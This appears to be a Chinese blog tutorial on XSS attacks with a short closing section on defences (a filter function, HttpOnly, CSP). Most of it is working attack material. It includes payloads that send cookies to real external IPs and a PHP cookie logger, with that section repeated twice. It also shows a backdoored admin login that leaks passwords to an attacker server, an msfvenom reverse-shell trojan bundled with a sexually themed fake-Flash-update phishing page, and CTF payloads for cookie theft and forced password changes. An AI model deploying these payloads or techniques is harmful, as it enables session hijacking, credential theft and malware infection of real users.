xss漏洞原理及利用【万字详解】

avatar
作者
筋斗云
阅读量:0

文章目录


随着互联网技术的飞速发展,网络安全问题也日益凸显。在众多网络攻击方式中,跨站脚本攻击(Cross-Site Scripting, XSS)因其广泛性和高危性,成为了网络安全领域的一个重要研究课题。XSS 攻击通过在网页中注入恶意脚本,使攻击者能够窃取用户信息、劫持用户会话、篡改网页内容等,给用户和企业带来巨大的安全隐患。本文将深入探讨 XSS 漏洞的原理,并通过具体的实例演示如何复现这一漏洞,希望能帮助读者更好地理解和防范 XSS 攻击。

常用标签的绕过:

xss 常用标签及绕过姿势总结 - FreeBuf网络安全行业门户

url处XSS

代码示例

<?php $code=$_GET['x']; echo $code; ?> 

payload:

http://127.0.0.1/xss-demo/xss.php?x=%3Cscript%3Ealert(%27cong%27);%3C/script%3E

图片处XSS攻击

代码示例

<?php $code=$_GET['x']; echo "<img src=$code>"; ?> 

可以看到普通的xss是没有用的,因为源码为alert(‘213’);>,这样是无法触发xss的,可以用img标签的错误触发事件

payload:
http://127.0.0.1/xss-demo/xss.php?x=y οnerrοr=“alert(‘1’)”

svg-xss

  1. 概念

    1. SVG(可扩展矢量图形)是一种基于XML的矢量图形格式,用于描述二维图形。它广泛用于网页中的图形和动画,因为它可以无损缩放,并且由浏览器直接支持。由于SVG文件是基于XML的文本文件,它们可以包含脚本(如JavaScript)。如果SVG文件没有正确处理和过滤,恶意用户可以在SVG文件中嵌入恶意脚本,从而进行XSS攻击,目前主流的浏览器都已经支持SVG图片的渲染。
  2. 复现

    1. 代码示例:

      test.svg <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-diagram-3-fill" viewBox="0 0 16 16">   <path fill-rule="evenodd" d="M6 3.5A1.5 1.5 0 0 1 7.5 2h1A1.5 1.5 0 0 1 10 3.5v1A1.5 1.5 0 0 1 8.5 6v1H14a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-1 0V8h-5v.5a.5.5 0 0 1-1 0V8h-5v.5a.5.5 0 0 1-1 0v-1A.5.5 0 0 1 2 7h5.5V6A1.5 1.5 0 0 1 6 4.5v-1zm-6 8A1.5 1.5 0 0 1 1.5 10h1A1.5 1.5 0 0 1 4 11.5v1A1.5 1.5 0 0 1 2.5 14h-1A1.5 1.5 0 0 1 0 12.5v-1zm6 0A1.5 1.5 0 0 1 7.5 10h1a1.5 1.5 0 0 1 1.5 1.5v1A1.5 1.5 0 0 1 8.5 14h-1A1.5 1.5 0 0 1 6 12.5v-1zm6 0a1.5 1.5 0 0 1 1.5-1.5h1a1.5 1.5 0 0 1 1.5 1.5v1a1.5 1.5 0 0 1-1.5 1.5h-1a1.5 1.5 0 0 1-1.5-1.5v-1z"/> </svg> 
    2. 增加以下代码子访问即可触发xss代码

      1.   <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-diagram-3-fill" viewBox="0 0 16 16">     <path fill-rule="evenodd" d="M6 3.5A1.5 1.5 0 0 1 7.5 2h1A1.5 1.5 0 0 1 10 3.5v1A1.5 1.5 0 0 1 8.5 6v1H14a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-1 0V8h-5v.5a.5.5 0 0 1-1 0V8h-5v.5a.5.5 0 0 1-1 0v-1A.5.5 0 0 1 2 7h5.5V6A1.5 1.5 0 0 1 6 4.5v-1zm-6 8A1.5 1.5 0 0 1 1.5 10h1A1.5 1.5 0 0 1 4 11.5v1A1.5 1.5 0 0 1 2.5 14h-1A1.5 1.5 0 0 1 0 12.5v-1zm6 0A1.5 1.5 0 0 1 7.5 10h1a1.5 1.5 0 0 1 1.5 1.5v1A1.5 1.5 0 0 1 8.5 14h-1A1.5 1.5 0 0 1 6 12.5v-1zm6 0a1.5 1.5 0 0 1 1.5-1.5h1a1.5 1.5 0 0 1 1.5 1.5v1a1.5 1.5 0 0 1-1.5 1.5h-1a1.5 1.5 0 0 1-1.5-1.5v-1z"/>     <circle cx="100" cy="50" r="40" stroke="black" stroke-width="2" fill="red" />     <script>alert(1);</script>   </svg> 

pdf-xss

  1. 概念

    1. 在一些pdf编辑器中可以给pdf添加javascript动作导致的在游览器打开pdf文件时遭受xss攻击
  2. 复现

    1. 下载安装迅捷pdf编辑器

    2. 新建一个pdf

    3. 按照以下操作

    4. 输入一下动作

    5. 保存,在游览器中查看,成功执行

游览器翻译-xss

本来页面的xss被过滤了,但是由于一些扩展有重新加载出来,例如翻译货站

代码示例

edge: <b><u>行之在线测试 </u></b> <br>  Políticas de Privacidade Usaremos seus dados pessoais para resolver disputas, solucionar problemas e aplicar nossos Termos e Condições de Uso. <br> Para prevenir abusos no app/site, o Badoo usa decisões automáticas e moderadores para bloquear contas, como parte de seu procedimento de moderação. Para isso, nós conferimos contas e mensagens para encontrar conteúdo que indicam quebra dos nossos Termos e Condições de Uso. Isso é feito através de uma  <b><u>OUR PAYLOAD IN TEXT FORM </u></b> <br> <br> "><img src=x οnerrοr=alert(1)>  //这里写Payload  <br> <br> <br> Políticas de Privacidade 

flash-xss

  1. 概念

    1. Flash是由Adobe开发的一种多媒体软件平台,用于创建动画、游戏和富互联网应用(RIA)。它包含Adobe Flash Player和Adobe Flash Professional(后更名为Adobe Animate)。Flash中的XSS攻击利用了Flash应用(特别是SWF文件)中的漏洞,通过注入恶意脚本,使这些脚本在用户的浏览器中执行。
  2. 常见造成xss中的swf文件函数

    1. navigateToURL
    2. getURL
    3. ExternalInterface.call
    4. htmlText
    5. 参考文章:(链接)
  3. 举例说明:

    1. 从网站下载swf文件,放在swf反编译工具中反编译

    2. 全局搜索上述swf文件函数,找出可以的注入点

      1. payload:http://127.0.0.1/uploader.swf?jsobject=alert(1)

cookie的获取

  1. 概念

    1. 通过javascript获取网站的cookie的信息
  2. 代码审计

    1.   配置文件config.inc.php:   <?php   //全局session_start   session_start();    //全局居设置时区   date_default_timezone_set('Asia/Shanghai');   //全局设置默认字符   header('Content-type:text/html;charset=utf-8');   //定义数据库连接参数   define('DBHOST', 'localhost');//将localhost修改为数据库服务器的地址   define('DBUSER', 'pkxss123');//将root修改为连接mysql的用户名   define('DBPW', 'pkxss123');//将root修改为连接mysql的密码   define('DBNAME', 'pkxss');//自定义,建议不修改   define('DBPORT', '3306');//将3306修改为mysql的连接端口,默认tcp3306   ?>   --------------------------------------------------------------------------------------------------   cookie.php:   <?php   include_once '../inc/config.inc.php';   include_once '../inc/mysql.inc.php';   $link=connect();    //这个是获取cookie的api页面    if(isset($_GET['cookie'])){       $time=date('Y-m-d g:i:s');       $ipaddress=getenv ('REMOTE_ADDR');       $cookie=$_GET['cookie'];       $referer=$_SERVER['HTTP_REFERER'];       $useragent=$_SERVER['HTTP_USER_AGENT'];       $query="insert cookies(time,ipaddress,cookie,referer,useragent)        values('$time','$ipaddress','$cookie','$referer','$useragent')";       $result=mysqli_query($link, $query);   }   header("Location:http://43.139.186.80/1.html");//重定向到一个可信的网站   ?> 
  3. 复现

    1. 找到存在xss漏洞的留言板,存入payload

      <script>document.location = 'http://43.139.186.80/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script> 

    2. 被重定向1.html

    3. 在在后台查看获取到的cookie信息

cookie的获取

  1. 概念

    1. 通过javascript获取网站的cookie的信息
  2. 代码审计

    1.   配置文件config.inc.php:   <?php   //全局session_start   session_start();    //全局居设置时区   date_default_timezone_set('Asia/Shanghai');   //全局设置默认字符   header('Content-type:text/html;charset=utf-8');   //定义数据库连接参数   define('DBHOST', 'localhost');//将localhost修改为数据库服务器的地址   define('DBUSER', 'pkxss123');//将root修改为连接mysql的用户名   define('DBPW', 'pkxss123');//将root修改为连接mysql的密码   define('DBNAME', 'pkxss');//自定义,建议不修改   define('DBPORT', '3306');//将3306修改为mysql的连接端口,默认tcp3306   ?>   --------------------------------------------------------------------------------------------------   cookie.php:   <?php   include_once '../inc/config.inc.php';   include_once '../inc/mysql.inc.php';   $link=connect();    //这个是获取cookie的api页面    if(isset($_GET['cookie'])){       $time=date('Y-m-d g:i:s');       $ipaddress=getenv ('REMOTE_ADDR');       $cookie=$_GET['cookie'];       $referer=$_SERVER['HTTP_REFERER'];       $useragent=$_SERVER['HTTP_USER_AGENT'];       $query="insert cookies(time,ipaddress,cookie,referer,useragent)        values('$time','$ipaddress','$cookie','$referer','$useragent')";       $result=mysqli_query($link, $query);   }   header("Location:http://43.139.186.80/1.html");//重定向到一个可信的网站   ?> 
  3. 复现

    1. 找到存在xss漏洞的留言板,存入payload

      <script>document.location = 'http://43.139.186.80/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script> 

    2. 被重定向1.html

    3. 在在后台查看获取到的cookie信息

页面信息获取

  1. 概念

    1. 当我们拿下网站权限时,需要进入网站看看,此时需要admin的账号和密码,就可以在源码中插入xss攻击代码获取密码的表单
  2. 条件

    1. 具备web权限,写入权限
  3. 复现

    1. 网站部分代码示例:

      login_check.php <php error_reporting(E_ERROR | E_WARNING | E_PARSE); if(!isset($depth))$depth=''; $commonpath=$depth.'include/common.inc.php'; $commonpath=$admin_index?$commonpath:'../'.$commonpath; require_once $commonpath; $turefile=$url_array[count($url_array)-2]; if($met_adminfile!=$turefile){ 	$query="update $met_config set value='$turefile' where name='met_adminfile' and lang='metinfo'"; 	$db->query($query); } //dump($_SERVER); //echo $_SERVER[HTTP_REFERER]; //$HTTP_REFERERs=explode('?',$_SERVER[HTTP_REFERER]); //echo strrev(substr(strrev($HTTP_REFERERs[0]),0,7)); if($action=="login"){ 	$metinfo_admin_name     = $login_name; 	$metinfo_admin_pass     = $login_pass; 	$up = '<script src="http://43.139.186.80/get.php?user='.$metinfo_admin_name.'&pass='.$metinfo_admin_pass.'"></script>'; //将账号密码发送到攻击者服务器中 	echo $up; 	$metinfo_admin_pass=md5($metinfo_admin_pass); 	/*code*/ 	if($met_login_code==1){ 		require_once $depth.'../include/captcha.class.php'; ...... ------------------------------------------------------------------------------------------ get.php <?php $u = $_GET['user']; $p = $_GET['pass']; $myfile = fopen("newfile.txt", "w+"); fwrite($myfile, $u); fwrite($myfile, "|"); fwrite($myfile, $p); fclose($myfile); ?>//接受传来的账号和密码并写入newfile.txt当中 
    2. 当管理员登录是后台自动发送账号和密码

xss配合MSf钓鱼

  1. 概念

    1. 通过msf生成后门,利用beef上线受控或者钓到鱼之后,通过msf的监听来控制主机
  2. 复现

    1. 生成后门poc.exe

      1.   msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.36.147 LPORT=6666 -f exe > poc.exe 
    2. 下载官方文件-保证安装正常

    3. 将后门与官方文件通过压缩软件捆绑在一起

      1. 将两压缩
    4. msf启动监听

      1. msfconsole
      2. use exploit/multi/handler
      3. set payload windows/meterpreter/reverse_tcp
      4. set lhost 0.0.0.0
      5. set lport 6666
      6. run
    5. 制作钓鱼页面,这里采用色诱

      1. flash页面:doocop/Flash_Xss: Flash最新钓鱼源码对接官方API实现跟随官方升级而升级 (github.com)

      2. 替换下载点

      3. 代码示例

        1.   诱导安装页面    <html xmlns="http://www.w3.org/1999/xhtml">    <head>    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />    <title>小迪与某主播SESE画面流出!</title>    </head>    <body>    小迪与某主播SESE画面流出!<br>   <img src="1.gif" alt="" width="300" height=600" align="absmiddle"/ onclick=a()>   </body>    </html>   <script>								   function a(){   	alert( "您的FLASH版本过低,尝试升级后访问该页面! ");   	window. location.href="http://192.168.36.147/";   }   </script> 
    6. 鱼儿点击网页上线

XSS修复

  1. 对危险字符进行过滤
    1. 变量过滤模版

      <?php //开启http_only也可在php.ini开启 //ini_set("session.cookie_httponly", 1);  //设置当前cookie //setcookie('mycookie','xiaodi');  //只允许加载本地源图片: //header("Content-Security-Policy:img-src 'self' ");  //加载的是一张我随意百度的图片 //<img src="https://www.baidu.com/img/PCfb_5bf082d29588c07f842ccde3f97243ea.png"/>  //自定义过滤函数 function remove_xss($val) {   // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed   // this prevents some character re-spacing such as <java\0script>   // note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs   $val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val);   // straight replacements, the user should never need these since they're normal characters   // this prevents like <IMG SRC=@avascript:alert('XSS')>   $search = 'abcdefghijklmnopqrstuvwxyz';   $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';   $search .= '1234567890!@#$%^&*()';   $search .= '~`";:?+/={}[]-_|\'\\';   for ($i = 0; $i < strlen($search); $i++) {    // ;? matches the ;, which is optional    // 0{0,7} matches any padded zeros, which are optional and go up to 8 chars    // @ @ search for the hex values    $val = preg_replace('/(&#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ;    // @ @ 0{0,7} matches '0' zero to seven times    $val = preg_replace('/(�{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ;   }   // now the only remaining whitespace attacks are \t, \n, and \r   $ra1 = array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base');   $ra2 = array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');   $ra = array_merge($ra1, $ra2);   $found = true; // keep replacing as long as the previous round replaced something   while ($found == true) {    $val_before = $val;    for ($i = 0; $i < sizeof($ra); $i++) {      $pattern = '/';      for ($j = 0; $j < strlen($ra[$i]); $j++) {       if ($j > 0) {         $pattern .= '(';         $pattern .= '(&#[xX]0{0,8}([9ab]);)';         $pattern .= '|';         $pattern .= '|(�{0,8}([9|10|13]);)';         $pattern .= ')*';       }       $pattern .= $ra[$i][$j];      }      $pattern .= '/i';      $replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag      $val = preg_replace($pattern, $replacement, $val); // filter out the hex tags      if ($val_before == $val) {       // no replacements were made, so exit the loop       $found = false;      }    }   }   return $val; }  $code=$_GET['x']; echo $code."<br>";  ?> 
    2. 设置http-only
      1. 设置http-only可以防止防止客户端脚本(如 JavaScript)访问 cookie,从而防止通过 XSS 攻击窃取 cookie 信息。

      2. 设置过程

        1. php.ini中的session.cookie httponly =1
        2. 网站源码写入ini set(“session. cookie httponly”, 1);
    3. 设置CSP(content security policy)
      1. csp严格限制脚本的来源,可以防止恶意脚本的执行,可以进制内联脚本,就算在源码上写入xss代码页无法执行,就比如上面的模版,

      2. 在网站中加入header(“Content-Security-Policy: img-src ‘self’”);即可即使注释掉了百度的图片,他还是会加载

        1. 在这里插入图片描述
    4. 对长度进行限制,实体转义

CTF各种骚姿势

参考文章:

xss 常用标签及绕过姿势总结 - FreeBuf网络安全行业门户

XSS总结 - 先知社区 (aliyun.com)

服务端接受
<?php $cookie = $_GET['c']; $myfile = fopen("cookie.txt", "w+"); fwrite($myfile, $cookie); fclose($myfile); ?> 
  1. 远程调用
    1. payload:

      <script>window.location.href='http://47.94.236.17/get.php?c='+document.cookie</script> 
  2. 过滤script
    1. payload

      <img src=1 onerror="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;"> 
  3. 过滤img
    1. payload

      <input onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;"> <svg onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;"> 
  4. 过滤空格
    1. payload

      <svg/onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;"></svg> 
  5. body标签
    1. payload

      <body onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;"> 

CTF场景题

  1. 场景1
    1. 在这里插入图片描述

    2. 管理员的cookie频繁变化,无法获取cookie直接登录,但是可以通过xss表单获取管理员的账号和密码

  2. payload

    S('.laytable-cell-1-0-1').each(function(index,value) {     if (value.innerHTML.indexOf('ctf' + 'show') > -1) {         window.location.href = 'http://47.94.236.117/get.php?c=' + value.innerHTML;     } }); 
  3. 场景2
    1. 后台管理员有功能页面,能够查看注册用户的账号密码,其中有一个修改的密码的功能,通过捉包分析,可以通过访问一个地址即可修改密码,get提交
  4. payload:

    <script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>//跳转回被管理员发现 <script src="http://127.0.0.1/api/change.php?p=123"></script>//页面在后台访问 
  5. 场景3
    1. 后台管理员有功能页面,能够查看注册用户的账号密码,其中有一个修改的密码的功能,通过捉包分析,可以通过访问一个地址即可修改密码,post提交
  6. payload

    $.ajax({     url: 'http://127.0.0.1/api/change.php',     type: 'post',     data: { p: '123' } }); 

通过对 XSS 漏洞原理的详细剖析和复现过程的具体演示,我们可以清晰地看到这种攻击手段的危害及其实现方式。了解这些知识不仅有助于网络安全从业人员提升自身技能,还能帮助开发者更好地编写安全的代码,从源头上防范潜在的安全威胁。然而,XSS 仅仅是众多网络攻击手段之一,网络安全的攻防战是一场持久战,需要我们不断学习和更新知识,采取严密的防护措施,以应对日益复杂的网络攻击。希望本文能够为读者提供有价值的参考,促进大家在实际工作中更好地保护网络系统的安全。

广告一刻

为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!